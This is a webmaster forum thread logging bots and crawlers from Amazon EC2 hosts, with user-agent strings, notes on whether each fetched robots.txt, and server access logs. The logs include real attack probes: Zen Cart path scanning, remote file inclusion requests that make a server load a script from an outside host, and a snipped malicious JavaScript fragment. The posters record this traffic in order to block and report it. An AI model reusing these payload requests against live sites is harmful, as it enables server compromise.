Forum Moderators: open
- robots.txt? NO
- Uneven apostrophes in UA (only closing)
- site in UA yields this oh-so-descriptive info:
<html>
<head>
</head>
<body>
</body>
</html>
----- ----- ----- ----- -----
FWIW, bona fide amazonaws.com hosts spewed at least 33 bots on two of my sites in recent months. (Does someone get paid per bot or something?) Some bots may be new to some of you; or newly renamed. Here are the actual UA strings; in no particular order:
NetSeer/Nutch-0.9 (NetSeer Crawler; [netseer.com;...] crawler@netseer.com)
robots.txt? YES
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
[Note ru.]
robots.txt? NO
feedfinder/1.371 Python-urllib/1.16 +http://www.aaronsw.com/2002/feedfinder/
robots.txt? NO
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008022910 Viewzi/0.1
robots.txt? NO
Twitturly / v0.5
robots.txt? NO
YebolBot (compatible; Mozilla/5.0; MSIE 7.0; Windows NT 6.0; rv:1.8.1.11; mailTo:thunder.chang@gmail.com)
robots.txt? NO
YebolBot (Email: yebolbot@gmail.com; If the web crawling affects your web service, or you don't like to be crawled by us, please email us. We'll stop crawling immediately.)
[Whattaya think robots.txt is for, huh?]
robots.txt? YES ... Four times in 45 minutes
Attributor/Dejan-1.0-dev (Test crawler; [attributor.com;...] info at attributor com)
robots.txt? NO
PRCrawler/Nutch-0.9 (data mining development project)
robots.txt? YES
EnaBot/1.2 (http://www.enaball.com/crawler.html)
robots.txt? YES
Nokia6680/1.0 ((4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html) )
[Note spaced-out closing parens]
robots.txt? YES
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461) Java/1.5.0_09
robots.txt? NO
TheRarestParser/0.2a (http://therarestwords.com/)
robots.txt? NO
Mozilla/5.0 (compatible; D1GArabicEngine/1.0; crawlmaster@d1g.com)
robots.txt? NO
Clustera Crawler/Nutch-1.0-dev (Clustera Crawler; [crawler.clustera.com;...] cluster@clustera.com)
robots.txt? YES
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
robots.txt? YES
yacybot (i386 Linux 2.6.16-xenU; java 1.6.0_02; America/en) [yacy.net...]
robots.txt? NO
Mozilla/5.0
robots.txt? NO
Spock Crawler (http://www.spock.com/crawler)
robots.txt? YES
TinEye
robots.txt? NO
Teemer (NetSeer, Inc. is a Los Angeles based Internet startup company.; [netseer.com...] crawler@netseer.com)
robots.txt? YES
nnn/ttt (n)
robots.txt? YES
AideRSS/1.0 (aiderss.com)
robots.txt? NO
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
robots.txt? NO
----- ----- ----- ----- -----
These two UAs alternated multiple times one afternoon:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
robots.txt? NO
WebClient
robots.txt? YES
----- ----- ----- ----- -----
And finally, way too many offerings from "Paul," who's apparently unable to make up his mind, UA name-wise:
Mozilla/5.0 (compatible; page-store) [email:paul at page-store.com
robots.txt? NO
Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com)
robots.txt? YES
Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]
robots.txt? YES
Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO
zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES
zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES
Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO
-----
Slippery little suckers indeed. Thank goodness I block amazonaws.com no matter what.
DAILY (multiple times; always HEAD requests):
ec2-75-101-197-164.compute-1.amazonaws.com
PycURL/7.18.2
ec2-174-129-141-109.compute-1.amazonaws.com
PostRank/2.0 (postrank.com)
WEEKLY (approx.; always HEAD requests):
ec2-174-129-91-231.compute-1.amazonaws.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
(Two days earlier, Netcraft sent its minion...)
lager.netcraft.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
I already have all known (to me) AWS blocks blocked with hits logged, including 67.202.0.0 - 67.202.127.255. It's when the hits cloud other logged issues that I react violently. :)
[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:38 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:52:41 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:53:17 2009] [client 174.129.175.212] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:54:09 2009] [client 174.129.175.212] client denied by server configuration: (file path)
That range, that place, gives irresponsible bot-runners a place to hide and breed.
ec2-67-202-25-2.compute-1.amazonaws.com
Toata dragostea mea pentru diavola
11/22 07:59:29 /1.1
11/22 07:59:29 /install.txt
11/22 07:59:29 /
11/22 07:59:30 /cart/
11/22 07:59:30 /zencart/
11/22 07:59:30 /zen-cart/
11/22 07:59:30 /zen/
11/22 07:59:30 /shop/
Here's info [webmasterworld.com] about the primary 'toata' UA. (There are variations.) As a Romanian-speaking pal of GaryK's translated here [webmasterworld.com], it means: "I love the devil."
ec2-67-202-60-246.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.0
//scriptdocument.write(unescape( [remainder of malicious javascript snipped]
At least AWS has recommendations/info [aws.amazon.com] for reporting abuse. Wonder if bad bots qualify as report-worthy, too?;)
---
P.S./FYI
The following hosts/UAs just requested the exact same 'file' -- the URIs match even down to the exact same clientid and site referenced -- within the same 20-minute period. Googlebot, which was the only one to request robots.txt, was also the only one to attempt the hit twice (1 min. apart):
icerocket.com
BlogSearch/1.0 +http://www.icerocket.com/
87.218.210-nn.q9.net
Java/1.6.0_14
crawl-66-249-71-107.googlebot.com
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
64.94.67.nnn
Moreoverbot/5.00 (+http://www.moreover.com; webmaster@moreover.com)
Who's crawling/exploiting whom?
ec2-75-101-196-241.compute-1.amazonaws.com
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (MrTweet/1.0)
robots.txt? NO
...an AWS IP in the midst of botnet accesses.
174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"
75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"
67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.2.96 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 936 "-" "-"
75.101.213.151 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
174.129.107.93 - - [19/Dec/2009:08:13:41 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
.
Mozilla/5.0
22:36:04///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?
ec2-204-236-129-29.us-west-1.compute.amazonaws.com
Mozilla/5.0
22:36:07///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?
Notes:
- The first hit's dot-as-host IP turned out to be 99.198.118.18*, a Chicago-based server farm. Search results show the same IP and exploit hitting elsewhere.
- The intra-URI exploit domain obfuscated in both hits as 'example.com' has approx. 2,150 search results. Its page title? "Verified by Visa" (and content includes "Start by entering your Visa card below...").
- If you're blocking on amazonaws.com subdomain formats, the second hit is slightly different. Typically, they're --
IP.compute-1(or2,etc).amazonaws.com
-- but this is:
IP.us-west-1.compute.amazonaws.com
There are more variations here [robtex.com]. (I block on amazonaws.com)
ec2-75-101-138-216.compute-1.amazonaws.com
Mozilla/5.0
10:47:33 //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?
Note: .su is the Soviet Union.
(FWIW, I won't keep posting exploit events because this thread's for spider-sitings and the fake UA has been reported.)
IP: 204.236.128.0 - 204.236.255.255
UA: Chen Li/Nutch-1.0 (Nutch spiderman; [chenli....] com. cn; chenlibiti @163. com)
Robots: No idea.
Amazon.com, Inc.
OrgID: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2
FWIW, here's yet another UA:
ec2-174-129-141-135.compute-1.amazonaws.com
Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
robots.txt? NO